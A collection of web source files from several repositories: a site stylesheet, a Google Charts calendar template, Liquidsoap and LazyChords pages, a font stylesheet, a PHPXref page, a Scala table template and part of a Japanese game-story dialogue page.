padding:8px; float:left; margin:6px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; font-size:14px; color:#0d9dd2; font-weight:bold; background-color:#151515; border:thin #333 solid; margin-left:0px; margin-bottom:12px;} .staffmember{width:214px; height:314px; float:left; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background:url(img/darkbg.jpg) repeat; border:thin #454545 solid; position:relative; margin-top:4px; margin-bottom:12px; margin-right:24px; margin-left:7px; display:inline;} .staffmember .modimg{width:200px; height:300px; overflow:hidden; margin-top:7px; margin-left:7px;} #pagecontent ul{ position:relative; left: 15px; /* 21px for full screen*/ display:block; clear:both;} /*CALENDAR STYLING*/ .fullcalendar{width:695px; /*880px for fullwidth*/ background:#CCC; border:thin white solid; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; padding:12px; background-image: linear-gradient(bottom, rgb(194,194,194) 10%, rgb(232,232,232) 93%); background-image: -o-linear-gradient(bottom, rgb(194,194,194) 10%, rgb(232,232,232) 93%); background-image: -moz-linear-gradient(bottom, rgb(194,194,194) 10%, rgb(232,232,232) 93%); background-image: -webkit-linear-gradient(bottom, rgb(194,194,194) 10%, rgb(232,232,232) 93%); background-image: -ms-linear-gradient(bottom, rgb(194,194,194) 10%, rgb(232,232,232) 93%); background-image: -webkit-gradient( linear, left bottom, left top, color-stop(0.1, rgb(194,194,194)), color-stop(0.93, rgb(232,232,232)) );} .days-names{height:40px; padding-top:24px; text-align:center; background:#444; } .fullcalendar tr{height:40px;} .fullcalendar td{border:thin solid #999; height:60px; width:60px; padding:4px;} .eventful-today li a{width:65px; height: auto; float:left; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background:#692f75; color:#FFF; font-weight:bold; float:left; list-style:none; padding:4px; font-size:11px; position:relative; top:-4px;padding-right:5px; } .eventful-post li a{width:65px; height: auto; float:left; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background:#692f75; color:#FFF; font-weight:bold; float:left; list-style:none; padding:4px; font-size:11px; position:relative; top:-4px;padding-right:5px; } .eventful li, .eventful-post li, .eventful-pre li{margin-bottom:15px;} .eventful-pre li a{width:65px; height: auto; float:left; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background:#999; color:#FFF; font-weight:bold; float:left; list-style:none; padding:4px; font-size:11px; position:relative; top:-4px;padding-right:5px; } .days-names td{color:#CCC; text-align:center; padding-top:14px; margin-bottom:-24px;} .em-calnav-prev { font-size: 22px; float: right; font-weight: bold; top: 18px; position: relative; right: 51px; z-index: 999;} .em-calnav-next{font-size:22px; float:left; font-weight: bold; top: 18px; position: relative; left: 37px; z-index: 999;} .month_name{ font-weight:bold; position:relative; top:20px; left:176px !important; /*240px for no sidebar*/ font-size:26px; color:#878787; } .gallery_container{float:left; display:block;} .galimage{width:145px; height:145px; float:left; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; background:url(img/darkbg.jpg) repeat; border:thin #454545 solid; position:relative; margin-top:4px; margin-bottom:8px; margin-right:7px; margin-left:7px; } .galconst{border:thin #666 solid; width:140px; height:140px; overflow:hidden; position:relative; top:2px; left:2px;} .galimage img{min-width:140px; min-height:140px; } /*CONTACT PAGE STYLING*/ .wpcf7-form-control-wrap input[type='text']{width: 300px; border: thin #EBEBEB solid; height: 32px; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; margin-top: 4px; padding-left: 6px; padding-right: 10px;} .wpcf7-form-control-wrap textarea{width: 300px; border: thin #EBEBEB solid; min-height:100px; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; margin-top: 4px; padding-left: 6px; padding-right: 10px; padding-top:6px; padding-bottom:10px; max-height:450px;} .wpcf7-mail-sent-ok{font-weight:bold; color:#1F9549;} .servicemodule{width:100%; clear:both; float:left;} .servicemet{ height: 18px; width: auto; padding-left: 10px; padding-right: 10px; background: #3D3D3D; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; margin: -4px 0px 12px 0px; color: #CCC; font-size: 10px; padding-top: 5px; float: left;} #pagecontent h1 { font-weight: 600; color: #FFF; font-style:normal; font-size: 16px; margin-bottom: 4px; } #pagecontent h2{font-weight:600; color:#1f9549; font-style:italic; font-size:14px; margin-bottom:4px;} #pagecontent h3 { font-weight: 600; color: #FFF; font-style: italic; font-size: 14px; margin-bottom: 4px; } #pagecontent h4 { font-weight: 900; color:#1f9549; font-size: 12px; margin-bottom: 4px; } #pagecontent h5 { font-weight: 500; color:#CCC; font-size: 12px; margin-bottom: 4px; } .leftin{ float:left; width:500px; height:auto;} .rightin{ border-left:thin solid #333; float:right; width:360px; height:auto; padding-left:12px; padding-bottom:12px; } .rightin .googlemap{float:left; float:left; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; background:url(img/darkbg.jpg) repeat; border:thin #454545 solid; position:relative; margin-top:4px; margin-bottom:16px; width:360px; height:260px; } .googlemap iframe{position:relative; top:5px; left:8px;} .content_tweets{width:200px !important; padding-left:0px; background:none;} .mt_header{padding-left:0px !important;} .avatar{display:none !important;} .tweet{width:186px !important; padding-left:4px !important; text-align:left !important; background: none !important; border-bottom: thin solid #bdbdbd !important;} .mt_text{padding-left:0px !important; width:190px;} .tweets{background-color:#e0e0e0 !important; margin-left:2px !important; padding-left: 0px !important; width:200px !important; magrin-top:4px;} #mce-EMAIL{border:none; outline:none; height:30px; width:230px; background:#1d1c20; margin-top:14px; margin-bottom:4px; border:thin solid #595959; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; padding-left:8px; padding-right:6px; color:#BBB;} #mc-embedded-subscribe{ border:none; outline:none; height: 30px; width: auto; padding-left: 10px; padding-right: 10px; background: #3d3d3d; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; margin: 6px 8px 0px 0px; font-size: 10px; float: left; color: #CCC;} #mc-embedded-subscribe:hover{ background-color:#1f9549; cursor:pointer;} .shopitem{ width: 200px; float: left; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background: url(img/darkbg.jpg) repeat; border: thin #454545 solid; position: relative; margin-top: 4px; margin-bottom: 12px; margin-right: 7px; margin-left: 7px; padding:3px; padding-bottom:12px; } .shopitem .shopname{ width: 200px; float:left; color: white; font-style: italic; font-weight: 600; font-size: 14px; text-align: center; margin-top:6px; margin-left:4px; } .shopprice{height: 20px; width: 150px; text-align:center; padding-left: 10px; padding-right: 10px; background: #3D3D3D; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; margin: 0px 0px 0px 0px; color: #CCC; font-size: 10px; padding-top: 3px; float: left; margin:0 auto; margin-top:8px; margin-left:13px; padding-top:8px;} .wpcf7-captchac{margin-top:3px;} .staff_post a{text-align: left; float: left; margin-left: 6px; margin-top: 6px; width: 186px; margin-bottom: 0px; padding-bottom: 5px; line-height: 17px; border-bottom: thin #CCC solid; background:none; color:#333; padding-left:4px; } .registerint{width: 180px; float: left; margin-left: 8px; text-align: left; line-height: 18px; } .registerform{width: 171px; border: thin #EBEBEB solid; height: 23px; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; margin-top: 4px; padding-left: 6px; margin-left: -4px; padding-right: 10px; padding-top: 0px; margin-bottom:3px; } .registerselect{width: 190px; float: left; margin-left: 7px; margin-top: 4px;} .registerbutton{height: 26px; width: auto; padding-left: 10px; padding-right: 10px; background: #3d3d3d; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; margin: 12px 8px 0px 0px; color: #CCC; font-size: 10px; padding-top: 2px; outline: none; border: none; margin: 0 auto; position: relative; left: -6px; margin-top: 14px; cursor:pointer;} .registerbutton:hover{background-color:#d2232a; border:none;} .modcontent img{margin-top:15px; margin-left:12px; border:thin solid #d3d3d3; float:left;} .modcontent .testim_name{color:#692f75; font-weight:600; float:left; margin-top:17px; margin-left:8px; font-size:14px;} .testim_name .dater{font-weight:700; font-size:12px; color:#666;} .modcontent .testim_content{float: left; width: 190px; text-align: left; margin-left: 10px; margin-top: 5px; line-height: 15px;} .modcontent .read-more{margin-left:12px;} .modcontent .meta{ height:18px; color:#CCC; font-size:10px; padding-top:6px; float:left;} #recipe{width:280px; height:auto; float:left; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background:url(img/darkbg.jpg) repeat; border:thin #454545 solid; position:relative; margin-top:4px; margin-bottom:12px; margin-right:24px; margin-left:7px; display:inline; padding-bottom:8px;} #recipe .modimg{width:266px; height:auto; overflow:hidden; margin-top:7px; margin-left:7px;} #recipe .modimg img{max-width:266px; height:auto;} #ingredientlist{width: 280px; float: left; height: auto; padding-bottom:16px; clear: both; margin-left: 7px; margin-bottom: 29px; border:thin #454545 solid; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; background: #1f1f1f; margin-right: 25px;} #ingredientlist h3{font-weight: 600; color: #1f9549; font-style: italic; font-size: 15px; margin-bottom: 4px; margin-top: 12px; margin-left: 12px; } #recipebox{width:220px; margin-left:12px; width: 220px; margin-left: 17px;} #recipebox li{line-height: 18px; margin-bottom: 14px;} .wp-caption { background: #606060; border: 1px solid #f0f0f0; max-width: 96%; padding: 5px 3px 10px; text-align: center; } .wp-caption p.wp-caption-text { position:relative; top: 13px; } #pagecontent img.aligncenter, #pagecontent img.alignleft, #pagecontent img.alignright{background: #606060; border: 1px solid #f0f0f0; max-width: 96%; padding: 5px 8px 6px; text-align: center;} .wp-pagenavi .last, .wp-pagenavi .first, .wp-pagenavi .extend{ background: #222; padding: 8px; padding-right: 10px; float: left; margin-right: 6px; border: thin solid #444; } .speed img{max-width:200px; max-height:130px;} #support .bx-prev, #support .bx-next{top: -207px;} .shopimg{overflow:hidden; width:200px; height:300px;} .shopimg img{max-height:300px; width:auto; } .eventful li a{width:70px; height: auto; background:#1f9549; color:#FFF; font-weight:bold; float:left; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; list-style:none; padding:4px; font-size:11px; position:relative; top:-4px;} li.Superwomen a{background:#e42696!important;} li.External.Event a{background:#2664e4!important;} li.Circuit.&.Stretch.Class a{background:#e47b26!important;} li.Circuit.Class a{background:#993399!important;} li.Strive.Fitness.Day a{background:#d8da20!important;} .pdf img{width:24px; height:24px; border:none; outline:none; position:absolute; left: -21px; top: -13px;} .downloadbutton { height: 19px; width: auto; padding-left: 10px; padding-right: 10px; background: #3d3d3d; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; color: #CCC; font-size: 10px; padding-top: 8px; outline: none; border: none; margin: 0 auto; position: relative; left: 0px; margin: 19px 13px 6px 36px; margin-top: 10px; float: left; cursor: pointer; border: none; text-decoration: none; padding-left: 22px; } .downloadbutton:hover{background-color:#d2232a; border:none; text-decoration:none;}
ginn/informes/calendar_template.html
pacoqueen/ginn
<html> <head> <script type="text/javascript" src="https://www.google.com/jsapi"></script> <script type="text/javascript"> google.load("visualization", "1.1", {packages:["calendar"]}); google.setOnLoadCallback(drawChart); function drawChart() { var dataTable = new google.visualization.DataTable(); dataTable.addColumn({ type: 'date', id: 'Date' }); dataTable.addColumn({ type: 'number', id: 'Disponibilidad' }); dataTable.addRows([ %(json)s ]); var chart = new google.visualization.Calendar(document.getElementById('calendar_basic')); var options = { title: "Sotck - pedidos pdtes. de servir", height: 1000, }; chart.draw(dataTable, options); } </script> </head> <body> <!-- <div id="calendar_basic" style="width: 1000px; height: 350px;"></div> --> <div id="calendar_basic" style="width: 1000px; height: 1000px;"></div> </body> </html>
website/orig/legacy/doc-dev/scripts/v4l_with_audio_sdl.html
savonet/liquidsoap-full
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <title>Liquidsoap dev :: Audio Stream Generation</title> <link href="../../css/new.css" type="text/css" rel="stylesheet" /> <script type="text/javascript" src="//www.google.com/jsapi"></script> <link rel="shortcut icon" href="../favicon.ico" /> <script> google.load("jquery", "1.6.1"); google.load("jqueryui", "1.8.14"); </script> <script type="text/javascript" src="../../js/jQuery.syntax/jquery.syntax.min.js"></script> <script type="text/javascript" src="../../js/liq-jquery.js"></script> </head> <body> <div class="menu"> <ul> <li id="menu-developers"> <a href="https://github.com/savonet/liquidsoap/issues" target="_blank">developpers</a> </li> <li id="menu-doc-api-www"> <a href="../reference.html">API</a> </li> <li id="menu-support"> <a href="documentation.html">documentation</a> </li> <li id="menu-download"> <a href="../../download.html">download</a> </li> <li id="menu-about"> <a href="../../index.html">about</a> </li> </ul> </div> <div class="section" id="main"> <h1>v4l_with_audio_sdl.liq</h1> <div class="content"> <pre class="syntax">s = input.v4l2_with_audio() output.sdl(s) </pre> <a href="v4l_with_audio_sdl.liq"> <img class="grab" src="../../images/grab.png" alt="Grab the code!" title="Grab the code!"> </a> </div> <div id="footer"> 2003-2017 Savonet team</div> </div> <script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script> <script type="text/javascript" src="../../js/search.js"></script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-927362-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>
_site/index.html
lazychords/lazychords.github.io
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>LazyChords project</title> <meta name="author" content="Lazychords team"> <!-- Le HTML5 shim, for IE6-8 support of HTML elements --> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- Le styles --> <link href="/assets/themes/twitter/css/1.4.0/bootstrap.css" rel="stylesheet"> <link href="/assets/themes/twitter/css/style.css?body=1" rel="stylesheet" type="text/css" media="all"> <!-- Le fav and touch icons --> <!-- Update these with your own images <link rel="shortcut icon" href="images/favicon.ico"> <link rel="apple-touch-icon" href="images/apple-touch-icon.png"> <link rel="apple-touch-icon" sizes="72x72" href="images/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" sizes="114x114" href="images/apple-touch-icon-114x114.png"> --> </head> <body> <div class="topbar"> <div class="fill"> <div class="container"> <a class="brand" href="/">LazyChords project</a> <ul class="nav"> <li><a href="/conctact.html">Team members</a></li> <li><a href="/screens.html">Screenshots</a></li> </ul> </div> </div> </div> <div class="container"> <div class="content"> <div class="page-header"> <h1>LazyChords project <small>Enhance your compositions</small></h1> </div> <div class="row"> <div class="span14"> <div align="center"> <img alt="_config.yml" src="/images/logo.png"> </div> <br /><br /> <h2>Presentation</h2> LazyChords is a project created by Master 1 students in computer science at ENS de Lyon.<br /> This project aims at providing a tool to allow musicians to find suitable accompaniments for their melodies. Currently, we focus on providing a good Chord Progression that fits the melody, and that sounds as well as possible. This can be useful independently of the user's musical skills : <ul><li>For beginners, it allows a quick generation of an a ready-to-play accompaniement without any theoretical background about composition.</li> <li>For advanced musicians, the software can be a source of interesting/unusual ideas, and speed up the overall composition process by providing a strong basis to start with.</li> </ul> <h2>Get the code and contribute</h2> The code is hosted on <a href="https://github.com/lazychords/lazychords-gui">github</a>. Contributions are welcomed: feel free to fork, report issues,… </div> </div> </div> <footer> <p>&copy; Lazychords team 2012 with help from <a href="http://jekyllbootstrap.com" target="_blank" title="The Definitive Jekyll Blogging Framework">Jekyll Bootstrap</a> and <a href="http://twitter.github.com/bootstrap/" target="_blank">Twitter Bootstrap</a> </p> </footer> </div> <!-- /container --> </body> </html>
Верстка/project/css/fonts.css
Zireael23/gnelica
 @font-face { font-family: "PT_Sans-Web-Bold"; src: url('../fonts/PT_Sans/PT_Sans-Web-Bold.eot'); src: local('☺'), url('../fonts/PT_Sans/PT_Sans-Web-Bold.woff') format('woff'), url('../fonts/PT_Sans/PT_Sans-Web-Bold.ttf') format('truetype'), url('../fonts/PT_Sans/PT_Sans-Web-Bold.svg') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: "PT_Sans-Web-BoldItalic"; src: url('../fonts/PT_Sans/PT_Sans-Web-BoldItalic.eot'); src: local('☺'), url('../fonts/PT_Sans-Web-BoldItalic.woff') format('woff'), url('../fonts/PT_Sans/PT_Sans-Web-BoldItalic.ttf') format('truetype'), url('../fonts/PT_Sans/PT_Sans-Web-BoldItalic.svg') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: "PT_Sans-Web-Italic"; src: url('../fonts/PT_Sans/PT_Sans-Web-Italic.eot'); src: local('☺'), url('../fonts/PT_Sans/PT_Sans-Web-Italic.woff') format('woff'), url('../fonts/PT_Sans/PT_Sans-Web-Italic.ttf') format('truetype'), url('../fonts/PT_Sans/PT_Sans-Web-Italic.svg') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: "PT_Sans-Web-Regular"; src: url('../fonts/PT_Sans/PT_Sans-Web-Italic.eot'); src: local('☺'), url('../fonts/PT_Sans/PT_Sans-Web-Regular.woff') format('woff'), url('../fonts/PT_Sans/PT_Sans-Web-Regular.ttf') format('truetype'), url('../fonts/PT_Sans/PT_Sans-Web-Regular.svg') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: "BankGothic_Medium"; src: url('../fonts/bg/BankGothic_Medium.eot'); src: local('☺'), url('../fonts/bg/BankGothic_Medium.woff') format('woff'), url('../fonts/bg/BankGothic_Medium.ttf') format('truetype'), url('../fonts/bg/BankGothic_Medium.svg') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: "BankGothicCMdBT-Medium"; src: url('../fonts/bg/BankGothicCMdBT-Medium.eot'); src: local('☺'), url('../fonts/bg/BankGothicCMdBT-Medium.woff') format('woff'), url('../fonts/bg/BankGothicCMdBT-Medium.ttf') format('truetype'), url('../fonts/bg/BankGothicCMdBT-Medium.svg') format('svg'); font-weight: normal; font-style: normal; }
_variables/error_messages_exist.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $error_messages_exist</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_variables'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logVariable('error_messages_exist'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Variable Cross Reference</h3> <h2><a href="index.html#error_messages_exist">$error_messages_exist</a></h2> <b>Defined at:</b><ul> <li><a href="../skins_fallback_v6/_messages.disp.php.html">/skins_fallback_v6/_messages.disp.php</A> -> <a href="../skins_fallback_v6/_messages.disp.php.source.html#l43"> line 43</A></li> <li><a href="../skins_fallback_v5/_messages.disp.php.html">/skins_fallback_v5/_messages.disp.php</A> -> <a href="../skins_fallback_v5/_messages.disp.php.source.html#l43"> line 43</A></li> </ul> <br><b>Referenced 8 times:</b><ul> <li><a href="../skins_fallback_v6/_messages.disp.php.html">/skins_fallback_v6/_messages.disp.php</a> -> <a href="../skins_fallback_v6/_messages.disp.php.source.html#l43"> line 43</a></li> <li><a href="../skins_fallback_v6/_messages.disp.php.html">/skins_fallback_v6/_messages.disp.php</a> -> <a href="../skins_fallback_v6/_messages.disp.php.source.html#l56"> line 56</a></li> <li><a href="../skins_fallback_v6/_messages.disp.php.html">/skins_fallback_v6/_messages.disp.php</a> -> <a href="../skins_fallback_v6/_messages.disp.php.source.html#l66"> line 66</a></li> <li><a href="../skins_fallback_v6/_messages.disp.php.html">/skins_fallback_v6/_messages.disp.php</a> -> <a href="../skins_fallback_v6/_messages.disp.php.source.html#l73"> line 73</a></li> <li><a href="../skins_fallback_v5/_messages.disp.php.html">/skins_fallback_v5/_messages.disp.php</a> -> <a href="../skins_fallback_v5/_messages.disp.php.source.html#l43"> line 43</a></li> <li><a href="../skins_fallback_v5/_messages.disp.php.html">/skins_fallback_v5/_messages.disp.php</a> -> <a href="../skins_fallback_v5/_messages.disp.php.source.html#l56"> line 56</a></li> <li><a href="../skins_fallback_v5/_messages.disp.php.html">/skins_fallback_v5/_messages.disp.php</a> -> <a href="../skins_fallback_v5/_messages.disp.php.source.html#l66"> line 66</a></li> <li><a href="../skins_fallback_v5/_messages.disp.php.html">/skins_fallback_v5/_messages.disp.php</a> -> <a href="../skins_fallback_v5/_messages.disp.php.source.html#l73"> line 73</a></li> </ul> <!-- A link to the phpxref site in your customized footer file is appreciated ;-) --> <br><hr> <table width="100%"> <tr><td>Generated: Sat Nov 21 22:13:19 2015</td> <td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td> </tr> </table> </body></html>
app/org/iatoki/judgels/jerahmeel/views/session/lesson/listSessionLessonsView.scala.html
ia-toki/judgels-jerahmeel
@(sessionId: Long, page: org.iatoki.judgels.play.Page[org.iatoki.judgels.jerahmeel.SessionLesson], orderBy: String, orderDir: String, filterString: String) @import org.iatoki.judgels.jerahmeel.services.impls.JidCacheServiceImpl @import org.iatoki.judgels.jerahmeel.controllers.routes @import play.i18n.Messages @import org.iatoki.judgels.play.views.html.table.tableView @import org.iatoki.judgels.play.views.html.table.tableHeadersView @import org.iatoki.judgels.play.views.html.table.searchView @import org.iatoki.judgels.play.views.html.table.paginationView @listFunc(newPageIndex: scala.Long, newOrderBy: String, newOrderDir: String, newFilterString: String) = @{routes.SessionLessonController.listSessionLessons(sessionId, newPageIndex, newOrderBy, newOrderDir)} @searchView(page.getPageIndex, orderBy, orderDir, filterString, listFunc) <div class="clearfix"></div> @tableView() { @tableHeadersView(page.getPageIndex, orderBy, orderDir, filterString, listFunc)( "id" -> Messages.get("commons.id"), "alias" -> Messages.get("session.lesson.alias"), "" -> Messages.get("session.lesson.name"), "status" -> Messages.get("session.lesson.status") ) <tbody> @for(sessionLesson <- page.getData()) { <tr> <td>@sessionLesson.getId</td> <td>@sessionLesson.getAlias</td> <td>@JidCacheServiceImpl.getInstance().getDisplayName(sessionLesson.getLessonJid)</td> <td>@sessionLesson.getStatus.name()</td> <td class="text-center"> <a href="@routes.SessionLessonController.viewLesson(sessionId, sessionLesson.getId)"><span class="glyphicon glyphicon-search" aria-hidden="true"></span></a> <a href="@routes.SessionLessonController.updateLesson(sessionId, sessionLesson.getId)"><span class="glyphicon glyphicon-pencil" aria-hidden="true"></span></a> <a href="@routes.SessionLessonController.deleteLesson(sessionId, sessionLesson.getId)" onclick="confirmLink ( event, this.href )"><span class="glyphicon glyphicon-remove" aria-hidden="true"></span></a> </td> </tr> } </tbody> } @paginationView(page, orderBy, orderDir, filterString, listFunc)
BFJPStoryArchive/BFJPStoryArchive/map106-dungeon2.html
Blackrobe/blackrobe.github.io
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="stylesheet" type="text/css" href="style/style.css"> <link rel="stylesheet" type="text/css" media="only screen and (min-device-width: 360px)" href="style-compact.css"> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-74917613-1', 'auto'); ga('send', 'pageview'); </script> </head> <body> <div class="dungeonBackgroundContainer"> <img class="dungeonFrame" src="../../BFStoryArchive/BFStoryArchive/dungeon_battle_collection/baseDungeonFrame.png" /> <img class="dungeonImage" src="../../BFStoryArchive/BFStoryArchive/dungeon_battle_collection/dungeon_battle_81061.jpg" /> </div> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara28_0.png" /> </div> <div class="speakerName"><a href="http://i.imgur.com/YTUavY0.png">ルジーナ</a></div> <div class="speakerMessage">…………。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_6.png" /> </div> <div class="speakerName"><a href="http://i.imgur.com/0ETuoqY.png">ティリス</a></div> <div class="speakerMessage">はぁっ、はぁっ……</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_4.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">ルジくん、歩くの早いよ~!</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_8.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">確かにグラ爺の話では、今回もグズグズして いられない状況かもしれないけど……。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_3.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">……って、この場所……?</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_6.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">ひどい……森がめちゃくちゃ……。 木々から生気がまったく感じられない。</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" /> <img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara97_6.png" /> </div> <div class="speakerName">ティリス</div> <div class="speakerMessage">ここで一体何が……?</div> </div> <br> <div class="dialogueContainer"> <div class="facePortrait"> <img class="facePortraitFrame" 